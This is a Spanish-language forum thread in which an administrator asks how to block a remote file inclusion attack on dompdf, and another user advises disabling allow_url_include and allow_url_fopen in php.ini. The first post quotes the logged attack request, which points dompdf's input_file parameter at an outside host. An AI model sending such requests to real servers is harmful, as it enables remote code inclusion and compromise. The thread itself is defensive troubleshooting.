ayuda con regla modsecurity

Jose1310 · #1 (**permalink**) 15/09/2010, 11:28

tengo un dominio al cual le estan haciendo el siguiente ataque:

Request
GET /dompdf/dompdf.php?input_file=http://secrise.com/lang/test.

Desearia saber , cual seria el formato adecuado de la regla modsecurity para bloquear todo tipo de acceso a este web secrise.com?

gracias

hyperwin · #2 (**permalink**) 15/09/2010, 12:41

Puedes modificar el php.ini y deshabilitar la inclusión de archivos remotos.

Jose1310 · #3 (**permalink**) 15/09/2010, 13:15

gracias por tu respuesta.

la pregunta del millon es : que cambios hay que hacer exactamente en el PHP.INI ??

hyperwin · #4 (**permalink**) 15/09/2010, 13:29

Deshabilita:

Cita:

allow_url_include

Jose1310 · #5 (**permalink**) 15/09/2010, 13:33

gracias por tu tiempo y paciencia en responder.

bueno, no encontré la opcion que dices. Pero si encontré la opcion "allow_url_fopen" el cual esta en ON

la opcion allow_url_include es la misma que allow_url_fopen ??

hyperwin · #6 (**permalink**) 15/09/2010, 13:42

Lo olvidaba depende de la versión de PHP que tengas instalada, pero te sugiero que desactives también "allow_url_fopen"

Lee lo siguiente

http://php.net/manual/es/filesystem.configuration.php

Jose1310 · #7 (**permalink**) 15/09/2010, 13:52

En el link que mencionas dice que "allow_url_include" esta desde php 5.2.0 en adelante-

Actualmente uso php 5.2.9 , pero no veo tal opcion

hyperwin · #8 (**permalink**) 15/09/2010, 14:02

Agrega en el archivo php.ini y reinicia el servicio

Cita:

allow_url_include = Off

Jose1310 · #9 (**permalink**) 15/09/2010, 14:49

poner ON esa variable?

creí que la opcion adecuada era ponerla OFF , y asi evitar pemitir el acceso

porfa, confirmar el valor de la variable

gracias

hyperwin · #10 (**permalink**) 15/09/2010, 15:26

Sorry .... si es en Off